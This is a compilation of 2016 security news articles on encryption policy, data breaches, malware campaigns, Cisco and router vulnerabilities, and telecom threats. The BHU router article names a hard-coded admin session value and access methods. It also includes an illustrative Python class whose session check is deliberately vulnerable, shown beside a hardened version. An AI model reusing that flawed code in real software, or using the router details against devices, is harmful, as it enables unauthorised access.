French interior minister Bernard Cazeneuve went on to say that encrypted messaging apps like Telegram and WhatsApp "constitute a challenge during investigations," making it difficult for law enforcement to conduct surveillance on suspected terrorists.
The proposal calls on the European Commission to draft a law that would "impose obligations on operators who show themselves to be non-cooperative, in particular when it comes to withdrawing illegal content or decrypting messages as part of an investigation."
The proposed laws would force major technology companies including Apple, WhatsApp, Facebook, Telegram, and many others, to build encryption backdoors into their messaging apps.
The European Union has always been a strong supporter of privacy and encryption, but the recent series of terrorist attacks across France and Germany this summer, including the Normandy church attack carried out by two jihadists who reportedly met on Telegram, has made the two countries call loudly for encryption backdoors.
Although the proposal acknowledges encryption to be a critical part in securing communications and financial transactions, it says that solutions must be found to "enable effective investigation" while protecting users’ privacy.
Privacy advocates have been alarmed by the new proposals, as the recent NSA hack has just proved to all of us that no system is hack-proof against attackers with the right skills and sufficient resources.
So, what happened to the NSA, the most sophisticated intelligence agency in the world, could happen to encrypted messaging services that feature an encryption backdoor for law enforcement.
The European Commission is expected to come up with new laws on privacy and security for telecom operators this fall, which would also cover third-party services such as WhatsApp or Telegram.

WhatsApp to Share Your Data with Facebook — You have 30 Days to Stop It
26.8.2016 thehackernews Safety
Nothing comes for Free, as "Free" is just a relative term used by companies to develop a strong user base and then use it for their own benefits.
The same has been done by the secure messaging app WhatsApp, which has now made it crystal clear that the popular messaging service will begin sharing its users’ data with its parent company, Facebook.
However, WhatsApp is offering a partial opt-out for Facebook targeted ads and product-related purposes, which I will explain later in this article, but completely opting out of the data sharing does not seem to be possible.
Let's look at what the company has decided to do with your data.
Of course, Facebook is willing to use your data to sell more targeted advertisements.
WhatsApp introduced some significant changes to its privacy policy and T&Cs today which, once accepted, give it permission to connect users' Facebook accounts to WhatsApp accounts for the first time, giving Facebook more data about users for delivering more relevant ads on the social network.
The messaging service will also begin pushing users to share some of their account details, including phone numbers, with Facebook, allowing the social network to suggest phone contacts as friends.
When Facebook acquired WhatsApp for $19 Billion in 2014, users were worried about the company's commitment to protecting its users' privacy. But, WhatsApp reassured them that their privacy would not be compromised in any way.
"Respect for your privacy is coded into our DNA, and we built WhatsApp around the goal of knowing as little about you as possible," said WhatsApp co-founder Jan Koum in a blog post published at that time.
Now the WhatsApp users are feeling betrayed by the company's latest move.
However, you need not worry about the contents of your WhatsApp messages, like words and images, as they are end-to-end encrypted, meaning that even the company cannot read them.
Ultimately, the two companies will be sharing what they call a limited amount of user data, which includes phone numbers and other information about users.
No Option to Completely Opt-Out of Data Sharing
If you think WhatsApp is more privacy conscious than Facebook’s Messenger, it is not anymore.
WhatsApp is offering a way to partially opt out of the data sharing, specifically for Facebook ad targeting and product-related purposes.
However, the company notes that data will still be shared "for other purposes such as improving infrastructure and delivery systems, understanding how our services or theirs are used, securing systems, and fighting spam, abuse, or infringement activities."
So, for those thinking of opting out of the data sharing entirely: there is no way to opt out totally.
The one simple alternative is to stop using WhatsApp.
Here's how to opt out of sharing data for Facebook ad-targeting purposes:
The company has outlined two ways to opt out of the exchange of information with Facebook on its blog.
One way is for those users who have not yet agreed to the new terms of service and privacy policy, so before agreeing to the new terms, follow these simple steps:
When prompted to accept the updated T&Cs, tap Read to expand the full text.
A checkbox option at the bottom of the policy for sharing your data on Facebook will appear.
Untick this option before hitting Agree. This will let you opt out of the data-sharing.
The second option is for those who have already accepted the new T&Cs without unchecking the box to share their information with Facebook.
WhatsApp is also offering a thirty-day window for users to make the same choice via the settings page in the app. To exercise your opt-out in this scenario you need to follow these steps:
Go to Settings → Account → Share my account info in the WhatsApp app
Uncheck the box displayed there within 30 days, as after that this partial opt-out window will expire.
However, WhatsApp states Facebook will still receive your data in some situations.
After introducing end-to-end encryption, WhatsApp has become one of the most popular secure messaging apps, but this sudden shift in its privacy policy may force some users to switch to other secure apps like Telegram and Signal.

vBulletin vulnerabilities exposed more than 27 million users’ records
26.8.2016 securityaffairs Vulnerebility

Security vulnerabilities in the vBulletin platform have exposed more than 27 million accounts, many of them belonging to gamers on mail.ru.
The data breach monitoring service LeakedSource has disclosed 11 new data breaches. Security vulnerabilities in the vBulletin platform have exposed more than 27 million accounts, the majority of which belong to three games on mail.ru.

At the time of notification, the researchers from LeakedSource had managed to crack 12,463,300 passwords.

Another data breach, suffered by expertlaw.com, exposed more than 190,000 accounts, while a similar incident at gamesforum.com compromised more than 100,000 accounts.

A closer look at the compromised mail.ru accounts shows that they come from CFire, parapa.mail.ru (the ParaPa Dance City game), and tanks.mail.ru (the Ground War: Tanks game).

The mail.ru subdomains that were hacked in August 2016 are:

cfire.mail.ru – 12,881,787 users, 6,226,196 passwords cracked at the time of this post.
parapa.mail.ru (main game) – 5,029,530 users, 3,329,532 passwords cracked at the time of this post.
parapa.mail.ru (forums) – 3,986,234 users, 2,907,572 passwords cracked at the time of this post.
tanks.mail.ru – 3,236,254 users, 0 passwords cracked at the time of this post.

The mail.ru records include usernames, email addresses, IP addresses, and phone numbers. The other compromised accounts include usernames, passwords, email addresses, birthdays, and IP addresses.

“Not a single website used proper password storage, they all used some variation of MD5 with or without unique salts,” LeakedSource said.

What do all the compromised websites have in common?

All of the hacked domains were running unpatched versions of the vBulletin CMS. Hackers exploited SQL injection vulnerabilities in the Forumrunner add-on on vBulletin installations older than 4.2.2 or 4.2.3 to access their databases.

Once again a poor security posture is the root cause of these data breaches: millions of users’ records were exposed due to security issues that vBulletin fixed months ago.

“A security issue has been reported to us that affects vBulletin 4. We have released security patches for vBulletin 4.2.2 & 4.2.3 to account for this vulnerability. The issue could potentially allow attackers to perform SQL Injection attacks via the included Forumrunner add-on.” states the security advisory issued by vBulletin in June. “It is recommended that all users update as soon as possible. If you’re using a version of vBulletin 4 older than 4.2.2, it is recommended that you upgrade to the latest version as soon as possible. Please note that you need to update regardless of whether you have Forumrunner enabled. You can download the patch for your version here: http://members.vbulletin.com/patches.php”

In August, a new security update was issued to fix multiple vulnerabilities being exploited by hackers in the wild.

Linux.PNScan Trojan is back to compromise routers and install backdoors
26.8.2016 securityaffairs Virus

The Linux Trojan Linux.PNScan is back and it is actively targeting routers based on x86 Linux in an attempt to install backdoors on them.
Yesterday I wrote about a new Linux Trojan dubbed Linux.Rex.1, a new Linux malware that is capable of self-spreading and creating a peer-to-peer botnet; now experts from Malware Must Die have discovered a new strain of a malware family that emerged more than a year ago.

The Linux Trojan is Linux.PNScan. It was first spotted last year, when it was used to infect devices based on ARM, MIPS, or PowerPC architectures.

Now the threat has been discovered in the wild actively targeting routers based on x86 Linux in an attempt to install backdoors on them.

“As per shown in title, it’s a known ELF malware threat, could be a latest variant of “Linux/PnScan”, found in platform x86-32 that it seems run around the web within infected nodes before it came to my our hand. This worm is more aiming embed platform and I am a bit surprised to find i86 binary is hitting some Linux boxes.” states the analysis published by Malware Must Die!

“This threat came to MalwareMustDie ELF team task before and I posted analysis in Mon Sep 28, 2015 on kernelmode [link] along with its details and threat, I thought the threat is becoming inactive now and it looks like I’m wrong, as the malware works still in infection now as worm functions and is hardcoded to aim / 16 segment (located in network area of Telangana and Kashmir region of India), where it was just spotted. Since I never write about this threat in this blog (except kernelmode), it will be good to raise awareness to an active working and alive worm.”

Unlike the original variant Linux.PNScan.1, which attempted to brute-force router logins using a special dictionary, the new strain Linux.PNScan.2 targets specific IP addresses and attempts to establish SSH connections using a hardcoded list of credential combinations.


The new Linux.PNScan.2 was compiled with GCC (GNU) 4.1.x using a cross-compiler toolchain targeting i686, with SSL support enabled.

When the threat infects a device, it forks its process 4 times, creates certain files on the infected system, daemonizes and listens on 2 TCP ports, targets hardcoded IPs, and sends HTTP/1.1 requests via SSL to twitter.com on port 443 to hide its malicious traffic.

Like its predecessor, this variant can also brute-force logins.

The malware researchers who analyzed the threat suggest it might be of Russian origin.

“I guess this happened from 6 months ago until now, and the hacker is sitting there in Russia network for accessing any accessible infected nodes.” continues the analysis.

The experts from Malware Must Die! also published a list of infection symptoms: infected routers have specific processes running in the initial stage of the infection, the launched attack can be seen in the network connections, each contacted target is logged in the “list2” file and the brute-force list is kept in the “login2” file.

Cisco Updates ASA Software to fix the Equation Group’s EXTRABACON exploit

26.8.2016 securityaffairs Vulnerebility

Cisco has started releasing patches for its ASA software to address the Equation Group’s EXTRABACON exploit included in the NSA data dump leaked online.
Security firms and IT giants are analyzing the huge archive leaked by the Shadow Brokers crew after the hack of the NSA-linked Equation Group.

We reported that some of the exploits included in the archive are effective against Cisco, Fortinet, and Juniper network appliances.

For example, the BENIGNCERTAIN tool included in the NSA data dump could be exploited by remote attackers to extract VPN passwords from certain Cisco devices, while EXTRABACON was analyzed by the Hungary-based security consultancy SilentSignal, who found it could be adapted to newer models of Cisco’s Adaptive Security Appliance (ASA).

The EXTRABACON tool exploits the CVE-2016-6366 vulnerability to allow an attacker who has already gained a foothold in a targeted network to take full control of a Cisco ASA firewall.

The CVE-2016-6366 flaw affects Cisco’s ASA appliances, both firewalls and routers, Firepower products, Firewall Services Modules, industrial security appliances, and PIX firewalls.


The EXTRABACON tool leverages a flaw that resides in the Simple Network Management Protocol (SNMP) implementation of the ASA software.

“A vulnerability in the Simple Network Management Protocol (SNMP) code of Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, remote attacker to cause a reload of the affected system or to remotely execute code.” states the advisory published by CISCO.

“The vulnerability is due to a buffer overflow in the affected code area. The vulnerability affects all versions of SNMP. An attacker could exploit this vulnerability by sending crafted SNMP packets to the affected system. An exploit could allow the attacker to execute arbitrary code and obtain full control of the system or to cause a reload of the affected system. The attacker must know the SNMP community string to exploit this vulnerability.”

Cisco promptly analyzed the exploits and released the necessary patches. Network administrators who manage Cisco ASA 7.2, 8.0, 8.1, 8.2, 8.3, 8.4, 8.5, 8.6 and 8.7 have to update their installations to version 9.1.7(9) or later. The vulnerability has been fixed in ASA 9.1, 9.5 and 9.6 with the release of versions 9.1.7(9), 9.5(3) and 9.6.1(11).

The remaining versions will be fixed by the IT giant in the coming days; in the meantime, the company has provided a detailed description of the workarounds to implement as a temporary solution.

The company will not issue any patch for devices that are no longer supported, including firewall modules and PIX firewalls.

Unknown Bidder Buys 2,700 Bitcoins (worth $1.6 million) at US Government Auction
23.8.2016 thehackernews Security
A winning anonymous bidder bought 2,700 Bitcoins (worth roughly $1.6 Million) in an auction held by the United States Marshals Service (USMS) on Monday.
The US government announced at the beginning of this month its plans to auction 2,719 Bitcoins that were seized during several criminal, civil and administrative cases, such as the Silk Road case.
The US Marshals confirmed to CoinDesk that four bids were received in the auction that took place between 13:00 and 19:00 UTC on August 22.
The majority of the Bitcoins in the auction stemmed from investigations of the Silk Road online black marketplace.
The 2,719 Bitcoins in the auction included:
Around 1,300 Bitcoins seized from a civil case related to Matthew Gillum, a Silk Road drug dealer, who was sentenced to nine years in prison in 2015.
Only 2.8 Bitcoins directly came from Silk Road founder Ross Ulbricht, who was found guilty of operating Silk Road for illegal goods and handed two life sentences.
Some 65 Bitcoins came from Carl Force, a former Drug Enforcement Administration agent, who was sentenced for stealing Bitcoins during the Silk Road investigation.
Around 665 Bitcoins came from the case of Sean Roberson, a Florida man who allegedly created an online shop for selling stolen credit and debit cards.
The last date for registration was 18 August and only five bidders registered to claim the 2,700 BTC block, according to the agency.
However, this is not the first Bitcoin auction conducted by the US Marshals Service. The federal law enforcement agency has been selling off Bitcoins in a series of auctions.
The last USMS auction took place on November 15, when 11 bidders, including bitcoin exchange itBit, over-the-counter trading firm Cumberland Mining, and investor Tim Draper, bought 44,000 Bitcoins, worth $14.6 Million.

Epic Games Forum Hacked, Once Again — Over 800,000 Gamers' Data Stolen
23.8.2016 thehackernews Hacking
If you are a fan of Unreal Tournament from Epic Games or ever have participated in discussions on the online forums run by Epic Games, you possibly need to change your forum password as soon as possible.
It seems the forums of Unreal Engine and its creator, Epic Games, have recently been compromised by an unknown hacker or group of hackers, who stole more than 800,000 forum accounts, over half a million of them from the Unreal Engine forums alone.
The hackers got their hands on the forum accounts by exploiting a known vulnerability in an outdated version of the vBulletin forum software, which allowed them to access the full database.
Epic believes registration information that includes usernames, scrambled passwords, email addresses, dates of birth, IP addresses, and date of joining, may have been obtained in the attack.
"We believe a recent Unreal Engine and Unreal Tournament forum compromise revealed email addresses and other data entered into the forums, but no passwords in any form, neither salted, hashed, nor plaintext," reads an announcement on the Unreal Engine forum website.
However, ZDNet reports "their full history of posts and comments including private messages, and other user activity data from both sets of forums" have also been compromised.
Most of the stolen passwords are scrambled and cannot be cracked easily, but hackers could exploit the other stolen data to send phishing messages to forum members' email addresses in an effort to infect their systems with ransomware or other malicious software.
Epic Game Players at Risk
Moreover, there is bad news for players of Infinity Blade, UDK, Gears of War, and older Unreal Tournament games, as hackers may have compromised their salted hashed passwords, along with their email addresses and other data entered into the forums.
At the time of writing, the Epic Games' forum and Unreal Engine forums both appeared to be down.
So, users are advised to change their forum account passwords as soon as possible, pick a longer and stronger one this time, and change passwords for other online services as well, especially if they use the same password for multiple sites.
You can use a good password manager that allows you to create complex passwords for different sites and remember them for you.
We have listed some of the best password managers that could help you understand the importance of a password manager and choose a suitable one according to your requirements.
LeakedSource, a search engine site that indexes leaked login credentials from data breaches, has added the breached data from the Epic Games' forums into its database, which includes the password hashes to allow its users to search for their stolen data.

IoT – Shocking : How your home sockets could aid in Cyber attacks
23.8.2016 securityaffairs Security

IoT devices are dramatically enlarging our attack surface; hackers can exploit smart sockets to shut down critical systems.
I love some of the gangster nicknames people come up with. Knuckles, Fat Tony, Stab Happy or even Bambi. Names are characteristic of their personality and attitude. It's time to add Toaster Socket to the list, as in the age of the Smart Grid, criminals are getting updated.

The Internet of Things (IoT), which may soon become the "Internet of Everything," is something that has made every security professional re-examine all of their security strategies. Security has been a challenge even when it came to handling our basic Information and Communication Technology (ICT) systems. With the disruptive and highly welcomed IoT age upon us, we may soon face larger challenges.

Recent research by Bitdefender found that smart electrical sockets can be easily exploited and turned into zombies in a botnet.

“The vulnerable device is a smart electrical switch that plugs into any wall socket and enables users to schedule a connected electronic device on and off from their smartphone. It can power any gadget – thermostats, smart TVs, coffee makers, security cameras, garage doors, and medical devices and so on.” states BitDefender.

IoT hacking critical systems

Those who know the challenges an enterprise can face while fending off attacks from such botnets will realize that we are adding ammunition to the cybercriminal's arsenal.

Beyond exploiting the built-in operating system to execute commands, an attacker can affect the user by gaining access to their email, obtaining login credentials for their other wireless systems, or causing overheating and hence fire "accidents". The possibilities are endless.

Electrical and electronic appliances have had their recent fair share of negative media when it comes to being actors in cyber attacks. Surveillance cameras could be recruited in powerful botnets, smart LED light bulbs giving away WiFi passwords or refrigerators launching DDoS attacks.

Common issues security researchers found in the power outlet are weak password and username combinations, the lack of an encrypted configuration mechanism when joining your personal network (e.g. a home WiFi network), and weakly encoded information sharing between the vendor's servers and the appliance.

Based on the above discoveries Bitdefender outlined some ways of launching attacks and compromising your system where the attack vector is your smart socket.

First, gain access to your email and hence disable your two-factor authentication process (a great security measure, by the way).
Second, use a poorly filtered password-checking routine to inject code and, in effect, reset your entire system.
Coming to the meat of the matter, an attacker always wants to gain root access to a system, and the methods above plus a little effort could give them that. Hence your socket may end up being weaponized for cyber attacks, used to monitor and harm you (the user), used to gain access to other systems in your network and, a major overlooked issue, used to affect your privacy.

The solution is evident. You, the user, have to demand security as a basic need when buying such systems, or you may need bail money for your toaster switch, a.k.a. cybercriminal.

It is time to purchase a security solution specifically designed for IoT devices.

New Gozi Campaigns Target Global Brands with sophisticated features
23.8.2016 securityaffairs Virus

Researchers from Buguroo discovered new Gozi campaigns using new techniques that targeted many banks and financial services worldwide.
The Gozi malware was first spotted in 2007; its source code has been leaked twice in the criminal underground, allowing the creation of new sophisticated versions. Recently, security experts from IBM X-Force Research spotted a new threat dubbed GozNym Trojan that combines the abilities of the Gozi ISFB and Nymaim malware.

Researchers from Buguroo discovered new Gozi campaigns that targeted mainly banks and financial services in Spain, Poland, and Japan, the experts also noticed some targeted attacks on users in Canada, Italy, and Australia.

Threat actors behind the new Gozi campaigns are using new techniques spreading the malware in the United States and Western Europe.

In Spain, attackers delivered the malware by exploiting compromised WordPress websites. The malware was spread via malicious links leveraging URL shortening services.

The new campaigns are using dynamic web injection and automatically optimize the selection of mules after profiling the victim.

The web injections are very sophisticated and optimized to avoid detection; according to the report, the operators refined the mechanism after an attack had been discovered.

The greatest number of infections was observed in Poland and Japan, threat actors behind the campaign also used servers located in Canada, Italy, and Australia in other Gozi campaigns that hit these countries.

new Gozi campaigns

The new campaigns impacted popular brands, including BNP Paribas, Bank of Tokyo, CitiDirect BE, ING Bank, PayPal and Société Générale.

“A detailed analysis of how the webinjects work revealed that when an infected user at a target financial institution attempts a transaction, the C2 (Command and Control server) is notified in real time and sends the user’s browser the information necessary for carrying out fraudulent transfers.

What the user sees: The injected code presents a fraudulent deposit pending alert requesting the security key to complete the transfer.
What the bank sees: Hidden underneath, however, is the actual real transfer page being presented to the bank. The unsuspecting user is inadvertently entering their key, not to receive money, but to send their money to a “mule” designated by the malware operators”
The victim inadvertently enters the requested information and sends money to one of the selected “mules.”

The new Gozi campaigns also revealed that, for certain versions of the webinjects, the Trojan would send a kind of biometric information to the control panel. The information includes details on how long the user takes to move from an input field to the next one, this kind of information is precious to bypass protection systems that leverage user behavior.

The experts noticed some similarities between the webinjects used in these new Gozi campaigns and the one implemented by a malware family dubbed Gootkit.

“The webinjects used in these campaigns also revealed key similarities to GOOTKIT, not just related to the code and the techniques used, but also to the dates and times corresponding to its updates in the corresponding ATS panels—prompted by affected companies launching security measures to prevent the malware’s operation.” states the report. ”This development points to the professionalization of malware services trend. The services are sold underground by independent businesses and are able to deliver malicious code for use by different organizations, families of malware and campaigns.”

Members call for a Tor General Strike and shut down Tor for a day
23.8.2016 securityaffairs Safety
A few members of the community are calling for a ‘Tor general strike’ to protest against some decisions taken recently by the core members.
Last month, the Tor Project announced that an internal investigation had confirmed the allegations of sexual misconduct against the notorious member Jacob Appelbaum.

The allegations divided the internet privacy community; as a result of these events, the entire board of directors of the project was replaced.

News of the day is that a few members of the community are calling for a ‘Tor general strike.’ They want to express their dissent on the way the investigation was handled.

A message published on Twitter invites those who run parts of the Tor network infrastructure to shut down their machines, developers to stop working on Tor, and of course, users to stop using the anonymizing network.

Cryptome (@Cryptomeorg), 21 Aug 2016, 00:24: “#torstrike calls for global sit in on September 1 https://ghostbin.com/paste/kmnzz”
The members who are calling for a Tor General Strike are also opposed to the decision of the Tor Project to hire an ex-CIA official.

“Tor can no longer be trusted after #jakegate / #torgate and hire of CIA,” states the Ghostbin post that calls for the Tor Global Strike. “Its sinking credibility is putting people at risk. We hope it can be healed and regain trust with mass action. A short blackout may hurt in the short term, but save Tor in the long term. It will also allow dissenting voices to be heard.”

Joseph Cox from Motherboard reported on a leaked chat log from an internal Tor Project IRC channel showing that some members of the Project did not agree with the decision to hire a supposed ex-CIA agent, “DaveC1”.

Some internal members of the Tor Project were not aware of the past of DaveC1.

Tor Global Strike

A Tor General Strike is probably the worst way to express dissent: many individuals worldwide rely on the Tor network to avoid censorship and express their ideas without fearing for their lives.

“Journalists and activists use Tor in countries where people can be killed for the things they say,” Shari Steele, the Tor Project’s executive director told Motherboard. “Shutting down the Tor network would shut down their speech or, even more dangerous, could force them to use unsafe methods of communication.”

The call for the Tor General Strike includes 16 demands to the Tor Project, one of them being the sacking of co-founder Roger Dingledine.

Many demands included in the call for the Tor General Strike are related to the internal investigation of Appelbaum’s conduct. They demand that more details on the claims against Appelbaum be made public.

The news of the strike comes after the Tor relay operator Stephan Seitz shut down his node.

“The situation how the affair about Jake was handled by the Tor project has made me feel very uneasy. After digging through several material (for example https://shiromarieke.github.io/tor) I find that I am no longer believing in this project or trust it. That’s why I’m shutting down my tor relay fsingtor now.“ Seitz wrote to the Tor Project.

BHU Wi-Fi router, it is really too easy to hack these network devices
22.8.2016 securityaffairs Hacking

A security expert analyzed a BHU Wi-Fi router and found that it is easy to hack by an unauthenticated attacker that can access sensitive information.
Tao Sauvage, an expert from IOActive, has analyzed a BHU Wi-Fi router that he purchased during a trip. The BHU Wi-Fi router looks like a surveillance box but, according to the expert's analysis, it is affected by multiple vulnerabilities.

BHU Wi-Fi router

The network device is completely pwnable by an unauthenticated attacker that can access sensitive information.

The expert also explained that the BHU Wi-Fi router comes with hidden users, SSH enabled by default and a hardcoded root password … not bad for an attacker, what do you think?

The last scary discovery about the Chinese-made router is that it injects a third-party JavaScript file into all users’ HTTP traffic.

“The BHU WiFi uRouter, manufactured and sold in China, looks great – and it contains multiple critical vulnerabilities. An unauthenticated attacker could bypass authentication, access sensitive information stored in its system logs, and in the worst case, execute OS commands on the router with root privileges.” wrote Sauvage.

Sauvage used the UART debug pins to extract the firmware, analyzed it, and found multiple security vulnerabilities.

The expert noticed that the CGI script that handles everything reveals the admin cookie's session ID, which means the session could easily be hijacked by an attacker, who would thereby obtain admin privileges.

The BHU Wi-Fi router includes a hard-coded SID, 700000000000000; an attacker can get access to “all authenticated features” by presenting it to the router.

Presenting the above SID to the device revealed the hidden user dms:3.

“So far, we have three possible ways to gain admin access to the router’s administrative web interface:

Provide any SID cookie value
Read the system logs and use the listed admin SID cookie values
Use the hardcoded hidden 700000000000000 SID cookie value
” explained Sauvage.
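The three admin-access paths listed above all come down to how the CGI script treats the SID cookie. As an added illustration that is not IOActive's or BHU's code, the following Python models those flaws in a deliberately vulnerable validator next to a hardened one; the class names, the in-memory session store and the sample requests are constructed for this example, and only the hard-coded SID value comes from the write-up.

```python
"""
Added example (not IOActive's or BHU's code): a minimal model of the three
session-handling flaws the analysis attributes to the router's CGI script,
next to a hardened validator. Class names, the session store and the
sample requests are constructed for illustration.
"""
import hmac
import secrets
from dataclasses import dataclass

HARDCODED_SID = "700000000000000"   # the hidden SID value quoted in the write-up


@dataclass
class Request:
    """A constructed stand-in for an HTTP request: only cookies matter here."""
    cookies: dict


class VulnerableSessionCheck:
    """Models the flawed behaviour: any SID cookie is accepted, a hidden
    hard-coded SID is honoured, and the SID is written to the system log."""

    def __init__(self):
        self.log = []          # stands in for the world-readable system log

    def is_admin(self, req):
        sid = req.cookies.get("sid")
        if sid is None:
            return False
        # Flaw: the SID is written to a log an unauthenticated user can read
        self.log.append(f"request with sid={sid}")
        # Flaw: a fixed, hidden SID unlocks all authenticated features
        if sid == HARDCODED_SID:
            return True
        # Flaw: mere presence of the cookie is treated as authentication
        return True


class HardenedSessionCheck:
    """Server-side session store, random SIDs, expiry, constant-time
    comparison, and log lines that never carry the secret."""

    def __init__(self, ttl_seconds=900):
        self.ttl = ttl_seconds
        self._sessions = {}    # sid -> (username, issued_at)
        self.log = []

    def login(self, username, now):
        # 256-bit random SID; there is no fixed value to discover
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = (username, now)
        self.log.append(f"login user={username}")
        return sid

    def is_admin(self, req, now):
        sid = req.cookies.get("sid")
        if not sid:
            return False
        for known, (user, issued) in list(self._sessions.items()):
            # constant-time comparison so timing does not leak valid SIDs
            if hmac.compare_digest(known.encode(), sid.encode()):
                if now - issued > self.ttl:
                    del self._sessions[known]   # drop expired sessions
                    self.log.append(f"expired session user={user}")
                    return False
                self.log.append(f"authenticated user={user}")
                return user == "admin"
        self.log.append("rejected unknown sid")   # the SID itself is never logged
        return False
```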

It is incredible how full of security holes the BHU Wi-Fi router is: the researcher also discovered that the device fails to sanitize XML address values, which allows an attacker to carry out OS command injection.

The router could be used by attackers to eavesdrop on the device traffic using a command-line packet analyzer like tcpdump or to hijack it for other malicious purposes.

“At this point, we can do anything:

Eavesdrop the traffic on the router using tcpdump
Modify the configuration to redirect traffic wherever we want
Insert a persistent backdoor
Brick the device by removing critical files on the router.”
I invite you to take a look at the analysis published by IOActive; the number of issues affecting this specific device is amazing, and probably many others suffer from the same problems.

Let's hope the Chinese manufacturer that designed the device, BHU Networks Technology Co., is now aware of how insecure its router is.

Don’t forget that many powerful botnets leverage compromised SOHO devices.

Threat intelligence report for the telecommunications industry
22.8.2016 Kaspersky Security

The telecommunications industry keeps the world connected. Telecoms providers build, operate and manage the complex network infrastructures used for voice and data transmission – and they communicate and store vast amounts of sensitive data. This makes them a top target for cyber-attack.

According to PwC’s Global State of Information Security, 2016, IT security incidents in the telecoms sector increased 45% in 2015 compared to the year before. Telecoms providers need to arm themselves against this growing risk.

In this intelligence report, we cover the main IT security threats facing the telecommunications industry and illustrate these with recent examples.

Our insight draws on a range of sources. These include:

The latest telecoms security research by Kaspersky Lab experts.
Kaspersky Lab monitoring systems, such as the cloud antivirus platform, Kaspersky Security Network (KSN), our botnet tracking system and multiple other internal systems including those used to detect and track sophisticated targeted (advanced persistent threat, APT) attacks and the corresponding malware.
Underground forums and communities.
Centralized, specialized security monitoring systems (such as Shodan).
Threat bulletins and attack reports.
Newsfeed aggregation and analysis tools.
Threat intelligence is now a vital weapon in the fight against cyber-attack. We hope this report will help telecoms providers to better understand the cyber-risk landscape so that they can develop their security strategies accordingly.

We can provide more detailed sector and company-specific intelligence on these and other threats. For more information on our Threat Intelligence Reporting services please email intelligence@kaspersky.com.

Executive summary

Telecommunications providers are under fire from two sides: they face direct attacks from cybercriminals intent on breaching their organization and network operations, and indirect attacks from those in pursuit of their subscribers. The top threats currently targeting each of these frontlines feature many classic attack vectors, but with a new twist in terms of complexity or scale that place new demands on telecoms companies.

These threats include:

Distributed Denial of Service (DDoS) attacks. DDoS attacks continue to increase in power and scale and, according to the 2016 Data Breach Investigations Report, the telecommunications sector is hit harder than any other. Kaspersky Lab’s research reveals that in Q2, 2016, the longest DDoS attack lasted for 291 hours (or 12.1 days) – significantly longer than the previous quarter’s maximum (8.2 days), with vulnerable IoT devices increasingly used in botnets. Direct DDoS attacks can reduce network capacity, degrade performance, increase traffic exchange costs, disrupt service availability and even bring down Internet access if ISPs are hit. They can be a cover for a deeper, more damaging secondary attack, or a route into a key enterprise subscriber or large-scale ransomware attack.
The exploitation of vulnerabilities in network and consumer devices. Our intelligence shows that vulnerabilities in network devices, consumer or business femtocells, USBs and routers, as well as root exploits for Android phones, all provide new channels for attacks – involving malware and technologies that individuals, organisations and even basic antivirus solutions cannot always easily remove.
Compromising subscribers with social engineering, phishing or malware. These classic techniques remain popular and can easily be mastered by entry-level cybercriminals, although 2016 sees changes in how more sophisticated attackers conduct their campaigns. Growing numbers of cyber-attackers now combine data sets from different sources, including open sources, to build up detailed pictures of potential targets for blackmail and social engineering purposes.
Insider threat is growing. Detailed profiles of targets are also used to recruit insiders to help perpetrate cybercrime. Some insiders help voluntarily, others are coerced through blackmail. Insiders from cellular service providers are recruited mainly to provide access to data, while staff working for Internet service providers are chosen to support network mapping and man-in-the-middle attacks.
Other threats facing telecommunications companies include targeted attacks; poorly configured access controls, particularly where interfaces are publicly available to any Internet user; inadequate security for 2G/3G communications; and the risk of telecoms providers being drawn into unrelated attacks that exploit telecoms resources, and suffering collateral damage as a result.

Typical threats targeting telecoms


We can divide the main threats facing the telecommunications industry into two, interrelated, categories:

Threats targeting telecommunication companies directly. These include DDoS attacks, targeted attacks (APT campaigns), network device vulnerabilities and human-related threats like insider access, social engineering and the risk of allowing third parties to access information.
Threats targeting subscribers of telecoms services – particularly the customers of cellular service providers (CSPs) and Internet service providers (ISPs). These include malware for mobile devices, subscriber data harvesting, end-user device vulnerabilities, and more.
Threats directed at telecoms companies


DDoS (distributed denial of service) attacks remain a serious threat to telecoms providers around the world as attackers discover ever more ways of boosting the power and scale of attacks. Kaspersky Lab’s DDoS intelligence report for Q2, 2016 notes that websites in 70 countries were targeted with attacks. By far the most affected country was China, with South Korea and the US also among the leaders. 70.2% of all detected attacks were launched from Linux botnets, with cybercriminals paying close attention to financial institutions working with cryptocurrency. Another trend observed in Q2 was the use of vulnerable IoT devices in botnets to launch DDoS attacks.

The telecommunications sector is particularly vulnerable to DDoS attacks. According to the 2016 Data Breach Investigations Report, the telecommunications sector was hit around twice as hard as the second placed sector (financial exchanges), with a median DDoS packet count of 4.61 million packets per second (compared to 2.4 Mpps for exchanges).

The impact of a DDoS attack should not be underestimated. Direct attacks can reduce network capacity, degrade performance, increase traffic exchange costs, disrupt service availability and even bring down Internet access if ISPs are affected. With a growing number of connected devices and systems supporting mission-critical applications in areas such as healthcare and transport, unexpected downtime could be life threatening.

Further, DDoS attacks can be a cover for a deeper, more damaging secondary attack, or a route into a key enterprise subscriber or large-scale ransomware attack.

A good example of the first is the 2015 cyber-attack on the UK telecoms company, TalkTalk. The hack, allegedly perpetrated by a couple of teenagers, resulted in the loss of around 1.2 million customers’ email addresses, names and phone numbers, as well as many thousands of customer dates of birth and financial information – all ideal for use in financially-motivated social engineering campaigns. The forensic investigation revealed that the hackers had used a smokescreen DDoS attack to conceal their main activities.

DDoS attacks are also evolving. 2015 saw attackers amplify the power of DDoS attacks by turning them into DrDoS (Distributed reflection Denial of Service) attacks through the use of standard network protocols like NTP, RIPv1, NetBIOS (Network Basic Input/Output System) and BGP (Border Gateway Protocol). Another approach that is becoming more commonplace is the compromise of end-user routers via network-scanning malware and firmware vulnerabilities. Today’s faster mobile data transfer speeds and the growing adoption of 4G are also making smartphone-based botnets more useful for implementing DDoS attacks.

The worrying thing is that even inexperienced attackers can organize quite an effective DDoS campaign using such techniques.

Targeted attacks

The core infrastructure of a telecommunications company is a highly desirable target for cybercriminals, but gaining access is extremely difficult. Breaking into the core requires a deep knowledge of GSM architecture, rarely seen except among the most skilled and resourced cybercriminals. Such individuals can generally be found working for advanced, international APT groups and nation-state attackers, entities that have a powerful interest in obtaining access to the inner networks of telecommunication companies. This is because compromised network devices are harder to detect by security systems and they offer more ways to control internal operations than can be achieved through simple server/workstation infiltration.

Once inside the core infrastructure, attackers can easily intercept calls and data, and control, track and impersonate subscribers.

Other APTs with telecommunications on their radar

